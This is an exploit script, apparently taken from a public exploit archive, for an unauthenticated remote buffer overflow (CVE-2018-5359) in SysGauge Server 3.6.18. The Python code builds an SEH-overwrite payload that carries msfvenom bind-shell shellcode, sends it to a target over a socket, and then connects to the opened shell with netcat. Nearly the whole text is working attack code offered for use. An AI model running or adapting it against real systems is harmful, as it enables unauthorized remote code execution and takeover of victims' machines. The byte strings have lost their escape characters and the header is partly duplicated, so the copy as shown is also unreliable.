SysGauge Server 3.6.18 Buffer Overflow

# Exploit Title: SysGauge Server 3.6.18 - Buffer Overflow
# Exploit Author: Ahmad Mahfouz
# Description: Sysgauge Server Unauthenticated Remote Buffer Overflow SEH
# Contact: http://tw # Exploit Title: SysGauge Server 3.6.18 - Buffer Overflow
# Exploit Author: Ahmad Mahfouz
# Description: Sysgauge Server Unauthenticated Remote Buffer Overflow SEH
# Contact: http://twitter.com/eln1x
# Date: 12/01/2018
# CVE: CVE-2018-5359
# Version: 3.6.18
# Tested on: Windows 7 x64
# Software Link: hhttp://www.sysgauge.com/setups/sysgaugesrv_setup_v3.6.18.exe



from struct import pack
from os import system
from sys import exit
from time import sleep
import socket



port = 9221
host = '192.168.72.231'


stage1 = "x83xc4x7f" *16 # metasm > add esp,127
stage1 += "x83xc4x04" # metasm > add esp,4
stage1 += "xffxe4" # metasm > jmp esp
# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=1337 -f py -b 'x02'

buf = ""
buf += "xb8x01x69xedx6fxddxc3xd9x74x24xf4x5ax31"
buf += "xc9xb1x53x31x42x12x83xeaxfcx03x43x67x0f"
buf += "x9axbfx9fx4dx65x3fx60x32xefxdax51x72x8b"
buf += "xafxc2x42xdfxfdxeex29x8dx15x64x5fx1ax1a"
buf += "xcdxeax7cx15xcex47xbcx34x4cx9ax91x96x6d"
buf += "x55xe4xd7xaax88x05x85x63xc6xb8x39x07x92"
buf += "x00xb2x5bx32x01x27x2bx35x20xf6x27x6cxe2"
buf += "xf9xe4x04xabxe1xe9x21x65x9axdaxdex74x4a"
buf += "x13x1exdaxb3x9bxedx22xf4x1cx0ex51x0cx5f"
buf += "xb3x62xcbx1dx6fxe6xcfx86xe4x50x2bx36x28"
buf += "x06xb8x34x85x4cxe6x58x18x80x9dx65x91x27"
buf += "x71xecxe1x03x55xb4xb2x2axccx10x14x52x0e"
buf += "xfbxc9xf6x45x16x1dx8bx04x7fxd2xa6xb6x7f"
buf += "x7cxb0xc5x4dx23x6ax41xfexacxb4x96x01x87"
buf += "x01x08xfcx28x72x01x3bx7cx22x39xeaxfdxa9"
buf += "xb9x13x28x47xb1xb2x83x7ax3cx04x74x3bxee"
buf += "xedx9exb4xd1x0exa1x1ex7axa6x5cxa1x81x0e"
buf += "xe8x47xe3x60xbcxd0x9bx42x9bxe8x3cxbcxc9"
buf += "x40xaaxf5x1bx56xd5x05x0exf0x41x8ex5dxc4"
buf += "x70x91x4bx6cxe5x06x01xfdx44xb6x16xd4x3e"
buf += "x5bx84xb3xbex12xb5x6bxe9x73x0bx62x7fx6e"
buf += "x32xdcx9dx73xa2x27x25xa8x17xa9xa4x3dx23"
buf += "x8dxb6xfbxacx89xe2x53xfbx47x5cx12x55x26"
buf += "x36xccx0axe0xdex89x60x33x98x95xacxc5x44"
buf += "x27x19x90x7bx88xcdx14x04xf4x6dxdaxdfxbc"
buf += "x9ex91x7dx94x36x7cx14xa4x5ax7fxc3xebx62"
buf += "xfcxe1x93x90x1cx80x96xddx9ax79xebx4ex4f"
buf += "x7dx58x6ex5a"

shellcode = buf

payload = 'A' * 124 #offset
payload += 'xebx12x90x90' #jmp over seh retrun value
payload += 'x3bx38x01x10' * 4 # 0x1001383b : pop edi # pop esi # ret 0x04 | ascii {PAGE_EXECUTE_READ} [libdsm.dll]
payload += stage1
payload += 'x90' * (1000 - len(payload) - len(shellcode))
payload += shellcode



header = 'x75x19xbaxab'
header += 'x03x00x00x00'
header += 'x00x40x00x00'
header += pack('<I', len(payload))
header += pack('<I', len(payload))
header += pack('<I', ord(payload[-1]))
packet = header
packet += payload





s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:

print "[*] Testing connection to tatget %s:%s" %(host,port)
s.connect((host, port))

except:

print "[-] Unable to communicate to target %s:%s" %(host,port)
exit()



s.send(packet)

print "[*] Payload Sent.."
print "[*] Connecting to bind shell %s:1337 .." %host
sleep(3)
system("nc %s 1337"%host)